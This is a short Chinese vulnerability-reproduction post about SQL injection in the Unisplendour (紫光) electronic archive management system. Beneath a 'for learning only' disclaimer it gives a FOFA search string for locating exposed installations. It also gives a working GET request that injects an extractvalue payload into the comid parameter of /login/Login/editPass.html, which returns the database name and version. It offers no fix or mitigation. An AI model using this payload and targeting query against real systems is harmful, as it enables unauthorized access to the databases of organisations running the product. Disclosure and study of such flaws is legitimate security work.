紫光电子档案管理系统存在SQL注入漏洞（漏洞复现）

紫光电子档案管理系统存在SQL注入漏洞（漏洞复现）

0x01 前言

本次测试仅供学习使用，如若非法他用，与本文作者无关，需自行负责！！！

0x02 漏洞描述

紫光软件系统有限公司（以下简称“紫光软件”）是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。

0x03 影响范围

紫光电子档案管理系统

0x04 漏洞环境

fofa：“紫光档案管理系统”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （GET）

GET /login/Login/editPass.html?comid=extractvalue(1,concat(0x7e,database(),0x7e,version(),0x7e)) HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0

3.复现

输入上面的数据包，得到回显（当前数据库名以及版本号）